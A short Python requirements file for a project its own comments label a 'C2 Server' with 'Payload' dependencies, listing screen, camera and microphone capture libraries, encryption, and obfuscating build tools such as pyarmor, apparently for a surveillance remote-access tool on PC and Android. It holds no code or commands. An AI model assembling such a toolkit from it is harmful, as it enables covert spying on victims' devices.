# C2 Server
flask
flask-sock
flask-socketio
rich
requests
werkzeug

# Payload dependencies (PC)
numpy
mss
opencv-python
sounddevice
scipy
pycryptodome
plyer

# Build tools (optional)
pyinstaller
nuitka
pyarmor

# Android/APK only (install on Linux)
# pyjnius
# buildozer
